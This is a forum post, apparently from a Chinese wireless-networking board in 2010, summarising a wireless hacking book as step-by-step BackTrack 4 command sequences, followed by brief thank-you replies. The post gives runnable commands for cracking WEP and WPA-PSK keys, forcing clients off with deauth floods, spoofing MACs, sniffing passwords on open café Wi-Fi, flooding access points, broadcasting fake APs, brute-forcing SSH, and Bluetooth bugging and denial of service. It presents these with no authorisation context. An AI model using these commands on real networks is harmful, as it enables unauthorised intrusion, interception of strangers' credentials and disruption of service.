查看: 10319|回复: 35

[转载] 《无线黑客傻瓜书》读后总结

[复制链接]

主题

好友

3719

积分

少校

签到天数: 14 天

[LV.3]偶尔看看II

发表于 2010-2-10 10:59 |显示全部楼层
TG-NET
Anywlan微信公众号
这本书看了一个星期,终于看完了,现把书上的精华总结成如下内容,条理化知识点。
7 |7 X! ^' z4 v- I  ]6 ]
8 ]: B& S) Y( m, N- m! [6 L) _+ B以下所有操作均在BackTrack 4中进行。
3 ~7 A, R5 B% v+ |
$ T: |, e/ D( j* b
6 y# o* `% D) d无线WEP加密P解:
! x, R, x7 l1 _9 A5 [% B5 R; t1 F6 [' N8 O7 I- P
注入P解:
" q1 b8 O8 S; d, S3 m, |# h/ L1 T* N* T% a
4 X- |) @  b, Z0 E) s( Q- Mifconfig2 |1 j9 Q6 K& N! Y8 B

) d; W7 u( U3 J2 z/ I3 `9 nifconfig –a% c& F. w2 ^7 F2 C- ]7 p

; I. V+ ^: U0 p. difconfig wlan0(无线网卡) up/ |" d3 ^" S  x3 s! |
+ p* K0 y% ]2 K5 b, H
airmon-ng start wlan0
; |' l% y8 G: L+ l2 A6 X9 W
9 a0 |) ^# X  hairodump-ng mon0
, ?$ \* }# Z# p8 W3 d  x4 |  n3 P( }3 W
airodump-ng --ivs –w ivsfile –c 频道 mon0或  _; g3 x: |5 `/ H
& \: D( n5 h2 v/ F- A
airodump-ng --output-format ivs --ivs –w ivsfile –c 频道 mon09 H' f' {% e' b* x6 m

  p# |0 M4 A$ T$ C2 Baireplay-ng -3 –b BSSID –h Station mon0) Z! B. K# E1 h0 b% b3 h
) c4 O, q; S' L* ]) V5 @
aircrack-ng ivsfile-01.ivs
: I- u) Y$ k, I  y" F
7 R" }8 X, ]" \8 O/ K1 }) D虚连接P解(适用于无客户端连接APP解)
+ |: k3 ^/ _( N" t0 _7 l! p/ ^$ Z2 {: x& F' X6 R
ifconfig. W% w" t4 |9 P7 b( m% B* B

; x, d6 x2 _, i4 b3 B. i2 G, ~+ m$ `9 sifconfig –a
1 H: P4 u3 B6 G0 o9 x# Q6 v& `. A2 M  `0 ?6 ~% O0 u
ifconfig wlan0(无线网卡) up2 t2 ^2 m- U- h. c
7 Y/ q% D& I; m5 j- r7 d7 |
airmon-ng start wlan0
7 w- f) ~$ ~/ X
1 p5 {4 v1 o' \( H* aairodump-ng mon0: N7 ]! B# Y* o3 X& b

. p- r' x3 m$ a" r0 lairodump-ng --ivs –w ivsfile –c 频道 mon0或
5 \  @* Q+ ?6 \
: U4 S8 x) J& P, z; mairodump-ng --output-format ivs --ivs –w ivsfile –c 频道 mon0/ o  B- ^+ {2 A3 s3 c& r
# x$ u. ~0 w# a/ g
aireplay-ng -1 0 –e SSID –a BSSID –c Station mon0
, i3 Y% K) T& _3 f& ?  M' a6 f3 \
/ w( y+ j# _6 l; Aaireplay-ng -2 –p 0841 –c ffffffffffff –b BSSID –h 自己的MAC mon0/ [" W% \4 ~9 G

! k8 P( Q$ |% m. L9 z4 Uaircrack-ng ivsfile-01.ivs
& R- I+ m; ?& X
. L3 b% z; t' X6 s! q- J3 w& P
9 y& _: H! s- K4 o% K还有傻瓜式P解软件SpoonWEP2,SpoonWEP2中的Chopchop和Fragment来进行无客户端P解,P解时客户端MAC栏留空。& \6 {5 _8 F6 \

3 t* H( U+ f/ |' n$ K# v$ G
. x; B7 @) O- V  WWPA-PSKP解' Z+ ?1 A4 K) y& L+ K" z! h- }4 u# G" F

0 c/ s; f; M  _- @6 u$ N9 Nifconfig3 v8 }5 C8 e- L) O9 N: h
% p+ k" t* E6 C' k7 f
ifconfig –a
. b  H0 C+ D, o; c3 @) Z' i3 u' A; g- G
ifconfig wlan0(无线网卡) up. N+ j4 b% k( N) E$ t
) V. T8 I9 S; m# A, x
airmon-ng start wlan0$ S$ G/ N, {  W8 t) k! I
6 [6 `! V6 M4 E
airodump-ng mon0
! C% O0 k& B2 f2 o" K9 J3 I4 l8 Z* j  u: R1 v, c( N
airodump-ng –w capfile –c 频道 mon0/ J3 R5 Q! C* U

8 p3 S4 L  |$ Uaireplay-ng -0 10 –a BSSID –c Station mon0 //Deauth洪水攻击使合法客户端掉线捕获其与AP连接时的握手数据包
" e9 u/ T+ K3 R' `. N/ S: |# y$ M: h1 m% D
aircrack-ng –w Dic capfile-01.cap或+ E0 b$ C4 o# T
7 {% L* \2 k5 a- _' b
cowpatty –f Dic –r capfile-01.cap –s SSID% v9 N$ o9 z+ k; @( B

4 X8 Y  u" N- Q( u& H) l8 ^cowpatty –d HashTable.Hash –r capfile-01.cap –s SSID. E3 T% z; O$ `2 S
. W6 I3 {/ j; x/ G: \4 f& W
傻瓜式P解软件SpoonWPA。
8 q" J. L. t5 n. L8 R' ~
. h" F; ~: j0 d0 bBT4下自带的字典文件:/pentest/passwords/wordlists/darkc0de.lst, }8 x# }/ Y4 n) b/ t

& Q  j: M' Q; }0 u' |  j
9 l/ o' C$ m( k' M% |. }7 o字典文件的生成和上传
% R( ?  c3 l. q2 e
1 L( Q! r8 `' u在windows下使用生日密码生成器和社会工程学密码生成器 等生成字典。然后在BT4下开启Tftp、SSH或使用U盘传输。" F- q, d8 d% {- ~' Z* d

5 `8 b) b1 l/ u2 `2 l* t4 O. i* K5 ~8 h
BT4下开启Tftp:Services—TFTPD—start TFTPD) |/ R* H8 B' ~2 X% }- [
( K* `* n9 m" b  i/ L+ n! O) d/ k. m, }
在Windows的CMD中运行 tftp –i IP put **.dic
: U6 b% ^  D$ k* u1 B& {$ Z: P8 [6 c) }/ \2 ^
+ @# M( @8 {' o( ~$ i  n6 q
BT4下开启SSH:Services—SSH—start SSH* s  S1 R- Q$ [9 @6 X

  ~& q" X/ U2 n! T$ x( q, i' zWindows下使用CuteFTP新建连接:File--New—SFTP(SSH2)连接。使用BT4的root用户登录,前提是设置、修改密码:passwd root
1 a' d( `: y( M& X3 e7 o
- C9 Z+ b  T4 p/ T) R
( d2 q0 f! K7 Q9 ?9 K# o4 wAP限制MAC时的解决$ `* h! C  z' G# H4 `) A3 O
& j. y* b: a! B! b5 ~' \
当AP限制IP连接时,可以伪造为合法用户的MAC,关于AP连接的用户以及MAC,可以使用airodump-ng mon0查看。在BT4下修改MAC的命令为:
9 a. z! j# A, E+ N
4 q) l, `  Y: i' _. P+ K9 j" D5 Bifconfig wlan0 hw ether NewMAC
$ e; |9 p& `. s2 `
9 i9 p; ?* X& }
  H# y+ q% ]% t8 @关闭SSID广播的AP探测:7 {& h/ H  i+ ~6 ?- q5 r0 D/ e

9 f  B8 {  v/ I, i/ m4 Y1.     Deauth攻击:
6 Q" x# C4 p% a! j& y
) J. T, n& P4 c9 Vairodump-ng mon0, X+ u( J9 H# X: ]

6 G4 T% h" `9 K+ K( `  V" X8 eaireplay-ng -0 10 –a BSSID –h Station mon07 l7 m( y5 W8 g

+ m- \, N3 R; Z8 f2.     抓包分析( v5 r2 t. Z! `! P0 G& @9 D& e
% a. K, f/ R. x
Omnipeek& \: U" S- J. D9 |

; W6 E, y9 _$ ]2 \" tTcpdump –n –e –vvv –i 网卡名  S7 t; b1 U+ o3 M: g- g0 N, I, G

* m, L! B  q: I/ \6 G* n3.     暴力P解
2 _! A0 l0 P! @! R6 {* Q- ^+ R9 _  H6 K& v5 z8 J; t
Charon 1.1暴力P解
- X5 y- T7 t4 |+ b7 }2 k
( |7 P' I- ^4 u5 g0 }/ ?( \$ \' y, h5 p* l) Z, H
无线加密数据包的解密$ L& [* ~0 \7 T4 E7 a

" h. J& ^; J7 J# Q. ^
. N7 J. C7 F& ]3 w使用airodump-ng –w capfile –c 频道 mon0 捕获数据包并P解AP的密码 ,使用Cain的Cracker项在802.11Capturea导入解密。解密完后的数据包用Wireshark打开即可分析。
! {. |* `' a- Y0 u, f* B9 X8 j5 B3 h9 j
FilterNS     DNS解析数据包  B) i; F3 s  ?9 P/ F

0 U- e1 q5 U' h1 ^+ JFilter:HTTP    WEB访问数据包
2 X7 I5 r7 b% q* R8 P0 ~
+ r; F3 u/ O4 {4 DFilter:msnms   MSN  W; w+ k( \  o( H  m

$ g) ?/ b0 C, w! }2 c% X- {% `3 n5 ]Ctrl+F查找pass可以寻找一些明文的密码,如论坛等使用非SSL连接的账号。3 E" E2 T/ C, x4 C: s
0 _' `/ i$ X! n4 i
使用airdecap-ng解密:
1 Z2 e- k! T5 [3 C
7 O$ V- D# R; H' c1 L  SAirdecap-ng –b BSSID –e SSID –w 密码 ***.cap9 v( u# ~' f  H# a7 h/ V5 d1 i
) U8 W1 J5 ~7 A# x
: N; E, O6 }- _- z
咖啡馆中无线数据截取(开放式无加密AP)$ E0 _1 d5 |. n" g+ _3 h; m
0 g; ^5 L% }9 q
1.Airodump-ng –w data –c频道 mon0
- x7 U/ w% J/ m9 A
% k3 O: v$ A- H# F& w( }; O  ~9 T2.使用WireShark打开分析2 {! Z+ n) f% M: T0 g) M
$ F2 o0 Y, L7 C5 h4 P# d2 U

1 @2 Z9 [* y% }# X, VBT4下的渗透工具:( l' }0 W- f& q! b3 U2 p
# g' O* O8 l* \0 N; W1 o; r
nmap –sP IP/24        判断C段下存活的主机
4 e) U; ]: V( \  w) s$ t  B2 r
nmap –vv –sS IP/24 –p Port    扫描指定端口是否开放
4 q+ I8 ?! c0 l7 u+ c0 l* Q
' v: j$ f: f' C8 T4 Unmap –vv –sV IP –p port   指定端口的详细信息。。。
, V  [3 O" g' x# e9 R
; W5 y  q# N9 d# A. ynamp –O IP/24    判断主机的系统版本' \. `# Q' a) ~, z
9 F& u& [' S3 E- A& P3 E1 l2 _
, B% }2 W4 T+ c6 ~
GUI 版nmap:Zenmap # }1 X$ A5 {8 m, O# J: b: q

& F! A+ Q7 [& g: o2 i( t( _2 Z# p# J0 B2 U4 |; h
Amap使用:amap –B IP port
3 o; L  j/ [, t: N
) X+ k* N- Z' y; J9 H. Z6 LNbtscan(扫描Windows网络NetBios信息):9 ~. e# J( P5 A# f
. u: g8 l: D8 o' R. B: |
nbtscan –v –s : IP/240 }: Z  A. c  l9 g* H, i2 ?! p

4 c8 ^( T$ [; e4 cnbtscan –r IP
* N$ T: T2 [8 A: D! M( ?$ N
4 K5 D6 J( u% r
: W4 a; h  {2 b7 |$ JDNSWalk(指定域名的DNS探测):./dnswalk XXX.com.
- }% P( Y8 P; \- l* V$ W) T7 w
) v: Q; o' V+ ], k2 Y: F! @: I3 Y3 A! L( r$ n! n( K5 K
HydraP解工具(backtrack—Privilege Escalation—PasswordAttacks—OnlineAttacks)
7 F" m2 j8 M$ S1 z9 R, n+ D+ q& ^, z: b
BruteSSH: ./bruthe.py –h IP –u Username –d Dic" h$ F5 O# N0 S+ m4 T6 i

. ?' s$ W0 O: S0 G* Y/ o7 BMetasploit3使用
9 O- i0 V9 T* v. e$ n8 J无线D.0.S' I7 B# V, m# r# n
: C; q: W4 d' Q3 o& l

; }" P* v9 }# @) F7 S, dAuth Flood 攻击(Authentication Flood Attack,身份验证洪水攻击)
7 H1 R5 W# R3 T$ B7 V, @" D8 i& Z2 P
airmon-ng start wlan0
, d" ^1 B: o) _- Y
7 {0 W$ @1 i4 u# ]) d. u( }airodump-ng mon0
2 F' S4 H1 B' H% x
0 Y6 c& E1 i# ~, t% imdk3 mon0 a –a BSSID8 [& H& `* ~  j/ |6 C) w

- d4 W4 ^! t0 ^+ x% V3 y对所有的AP攻击:mdk3 mon0 a) ]) f9 d0 P! u( b1 E4 |/ l

' f6 U' `* y) H" u6 d
" n- D5 G2 [( [4 I" E( VDeauth Flood 攻击
) `1 Q9 G( T3 a( _
( |! {- v3 k- x# E7 C, T% Dmdk3 mon0 d –c Channel
( d" T& C2 {, ]
1 n" O, ^  p% L5 v0 i& Y7 X图形化D.O.S攻击:Charon5 g& G3 n% ^1 V; Q+ _! K
3 [+ a* p! a. m1 L9 e
4 P) E! @2 |7 F: G* V2 ~
当受到攻击时,使用Wireshark抓包可以看到异常信息。
. x6 ^! i, R+ u3 b) u; a
9 ?8 I+ v- v, i1 J4 A1 {$ F5 \! z" |- j# l1 `0 q1 `/ E6 C3 J& M7 P
WPA-PSK高速P解
5 f7 X9 y5 U3 C5 A+ T  S$ q5 c! A: {2 v1 l  h( A$ m: d/ \( n; c7 c* `
1.       WPA-PSK PMK Hash TablesP解: U; W/ g& c8 J+ k% Z1 \4 s! n: y: ]

( F$ t7 a) B# _5 H$ BCowpatty –d HashTable.hash –r ***.cap –s SSID% m" e  s% s/ q, b5 Y4 r

+ Y' H8 }; d4 Y; vHash Tables的制作: genpmk –f Dic –d SaveHash –s SSID- Z/ [6 L. S& |2 l) M

! ?! V" [# S1 O# F0 G" F; E* t8 ~2.       GPU辅助高速P解
7 x8 H/ ]( Q3 i& J) g+ M2 A3 a* q1 J5 L& t. B
使用EWSA(Elcomsoft Wireless Security Auditor,无线安全审计工具)导入WPA握手数据包P解,未注册版P解后密码只显示2位,但是可以使用WinHex查看(ALT+F9)ewsa进程的内存,搜索 密码的前两位。就可以看到完整密码。1 U0 M4 _; E. Y/ I
# `+ |& B4 y3 w+ D8 y, ]3 ]
3.       分布式P解& B4 Y; ~$ M1 `' ?+ A5 O

6 E$ I" Y& p! A( U0 U( q% ^" r# A2 Z( A, |5 x) D
AP的伪造2 `  [& \  F+ q+ U
& z  f  B# S) k5 ]& P: T, ~& y
把AP的MAC改成目标AP的MAC& [- N1 m; V# J' f1 F

# y, P( E2 S" d网卡软AP
5 I- F+ J7 }' ~& a$ V3 i4 a0 Y) N* `/ X9 b7 ]6 Z: E! {
0 P4 p; r, @/ o, }; D+ _
伪造大量虚假AP信号:
2 K" Z6 e0 u4 W: M( a, R' E9 e" g$ h5 o/ g. a/ c
随机SSID:mdk3 mon0 b –g –c 频道 $ D+ k4 u) e' {6 K4 [* m) J# U) u
0 n+ M, B) h7 l/ r* R; W* E
指定SSID:mdk3 mon0 b –g –c 频道 –n SSID –s 速度' h  U* [4 I0 B4 m
3 Z* |6 T+ U7 `1 v$ I5 X% v

/ m( Q. v. [+ y. J) jWar-Driving' q; v4 L( b8 e6 a

& [: b/ V; c4 u/ P热点地图绘制
$ W* \7 P7 j5 o
7 `, i; z$ g9 o3 ~- O. z) PWindows Mobile系统智能手机配合GPS模块,使用WIFifofum探测,把结果导出为kml(Google Earth可识别格式),在Google Earth中打开即可完成热点地图绘制。: ^7 }) h- f  X" r9 g: a4 k& T/ u, p

6 x6 @1 C; A% c
: Y. _+ i0 E8 Q7 VNetstumble3 ?, U/ A; l" }+ I

- {( E# q/ e" s" z
1 O9 d. G- b8 }3 S" j3 A蓝牙Hacking
3 z+ L  @% n$ L6 H. ~# E
# N) E* V6 V) T" LWindows下的Blue Soleil工具7 l- q' [; Q( F3 }; `6 F- q. w) y

, o4 P" q$ |) M! v( d* X" P( nBT4:
* j4 T; q* r  X7 e% e9 M' A+ q- y; p
' w; e  b" O) N3 Fhciconfig 查看蓝牙适配器+ v+ B* d2 L$ ]7 k  B

, y2 _2 p7 j9 l4 G2 s  ?. vhciconfig hci0 up 载入蓝牙适配器
/ V" M, h0 j+ [9 G$ S/ t
  E2 Z( ^9 q2 H5 L5 [# T+ r5 Lhciconfig hci0 class 蓝牙适配器详细信息
: `" ~+ I  x( p* e. L
4 o- D% p; Z& i3 V
5 n9 y- ?3 f: h% G  J! ?/ m! Ahcitool(扫描蓝牙)$ J1 m0 R( p# H& y$ V$ N/ n6 G/ c) z& ?) L

4 k$ ~: R- }$ P  Chcitool –i hci0 scan
  |, D3 E% a/ t- T' @5 p( y. W( d+ R2 x1 x
BTscanner(扫描蓝牙)0 M9 I+ e# f! f" J/ s

. m( t% w8 W. z4 ]' N' Q1 S1 u/ P! m' o9 I7 j0 ~! x3 x  [& t
蓝牙攻击:
% G, n) {/ I/ G# ^* L; }6 m1 J" u. ^3 }" _
BlueBugging (适用于BlueTooth V1.1的手机)
  N4 ~! E- m& Z& j4 ^, K6 C7 p1 D; A+ s2 p1 q
Bluebugger工具:4 H: u6 K5 s, P1 m' I

/ ^9 ~% \, S  S4 ]8 HBulebugger –a HD_Addr info% S) ^* X4 e6 U: i" V( G' d. a
6 f; w1 m8 }$ O0 U
9 F& `7 w/ ?0 N
BlueJacking1 b5 ?9 Z- w( ~* A
! b/ P& {6 D8 c) G3 z
实现方法:使用手机伪造假的名片,里面写上消息内容然后发送。) U" f% U' ?4 N

# r$ W& Q+ o0 t0 l4 n; J. O% J: k9 C, [
HD_Addr修改:4 C  T2 ?) W! ^- t; w6 x( ^6 w
  s5 f6 y0 a+ b( Q8 p
Bdaddr工具3 K: M& b* o6 }: P* V- f7 i5 ?

; j# A: {4 a: `- O' j+ Bbdaddr –i 蓝牙设备名 新HD_addr! a$ r5 i0 J3 @6 }5 E5 q! h3 }

/ _' I) p4 ]* q" [8 o5 J, W' ]- d( G
蓝牙D.O.S/ P5 [* r" j! Z1 w8 u$ Z4 x. ?: b
% q. z. B& W$ s2 {. R
l2ping工具(蓝牙连通性测试工具),改变其发包数据包大小,使目标设备拒绝服务
  e( s- w( y+ ~5 s/ c
7 ?: \9 G! {- r5 {hciconfig
  c+ U& q! h: M2 I4 m1 c& h0 S6 T. u
/ w& Q6 W  N  L6 d# W; F% z5 |hciconfig hci0 up6 ^9 _& ?$ m) W
1 S$ u$ g+ j/ l8 t, A- w
hcitool –i hci0 scan! a2 I9 s$ e4 ]2 ~) U- A0 b/ P
' u9 b1 W; b. m1 I. o  m
l2ping –s 10000 –目标MAC
# N, }! c$ K& }5 w
* R/ K. `7 V. ~( B5 u' M- N4 {1 |: O9 N% i1 h
不可见状态的蓝牙通过RedFang暴力P解(暴力尝试所有的HD_Addr)(概念性的软件)
: u7 I4 i; ]9 C6 z
& W) B$ T) S2 C# d( v./fang –r ************-############ -s! N6 n+ b7 P5 k* X4 u8 g/ q( s

( v1 l- A" V8 y; m! Y暴力P解************-############的蓝牙设备
: E; K- V5 y3 l: L# s7 f
* J% D* o  b5 e2 t./fang –l 各厂商BD_Addr分配, j0 G! R* R, ~1 ]- h# v4 ?" F

$ \3 o/ o4 I' p( k
( [% e. F+ l  P8 E' qWifiZoo使用$ ]3 Q$ X% J- G% b: n/ [

: V0 `7 _. k2 ]* L& s( V./wifizoo.py –c Capfile
4 G2 d+ g* `; L0 L  S! `2 K. v8 s
8 J6 R9 W) A9 F# D访问127.0.0.1:8000即可登录Wifizoo管理页面,查看数据包分析的详情

评分

2

查看全部评分

主题

好友

835

积分

中尉

该用户从未签到

发表于 2010-2-10 11:16 |显示全部楼层
传说中的沙发?
回复

使用道具 举报

主题

好友

149

积分

上等兵

该用户从未签到

发表于 2010-2-10 11:35 |显示全部楼层
我还正在学习中,先收藏。
回复

使用道具 举报

主题

好友

2266

积分

少校

签到天数: 2 天

[LV.1]初来乍到

发表于 2010-2-10 12:42 |显示全部楼层
总结的很好~谢谢分享
回复

使用道具 举报

主题

好友

1138

积分

上尉

签到天数: 5 天

[LV.2]偶尔看看I

发表于 2010-2-10 18:31 |显示全部楼层
分享成功的经验
回复

使用道具 举报

主题

好友

257

积分

少尉

该用户从未签到

发表于 2010-2-12 14:43 |显示全部楼层
呵 ....正在努力学习当中....
回复

使用道具 举报

主题

好友

760

积分

中尉

该用户从未签到

发表于 2010-2-14 14:51 |显示全部楼层
Exellent digest
回复

使用道具 举报

主题

好友

907

积分

中尉

签到天数: 13 天

[LV.3]偶尔看看II

发表于 2010-2-20 23:51 |显示全部楼层
谢谢看了!
回复

使用道具 举报

主题

好友

107

积分

上等兵

该用户从未签到

发表于 2010-2-20 23:54 |显示全部楼层
谁有电子的。
8 V4 w) M6 r( w& U+ m& E借来看看。
回复

使用道具 举报

主题

好友

157

积分

上等兵

该用户从未签到

发表于 2010-3-5 19:27 |显示全部楼层
LS的 估计不可能的 会被管理员和谐的1 Z$ ^$ Z" i  `
呵呵 其实也不贵 21块 快递再一点6 h; V! h' |1 t$ ]0 A
我们也支持一下超级版主这么多年对我们的解答哈
回复

使用道具 举报

主题

好友

487

积分

少尉

该用户从未签到

发表于 2010-3-6 00:31 |显示全部楼层
回复有理,顶贴无罪
回复

使用道具 举报

主题

好友

167

积分

上等兵

该用户从未签到

发表于 2010-3-8 18:56 |显示全部楼层
顶起~~~~~~~~~
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 我要加入

本版积分规则

Archiver| 手机版| 中国无线门户 ( 粤ICP备11076993 )  |网站地图    小黑屋 | 免责声明

GMT+8, 2016-5-1 00:52

Powered by Discuz! X3.2

© 2003-2013 广州威思信息科技有限公司

返回顶部 返回列表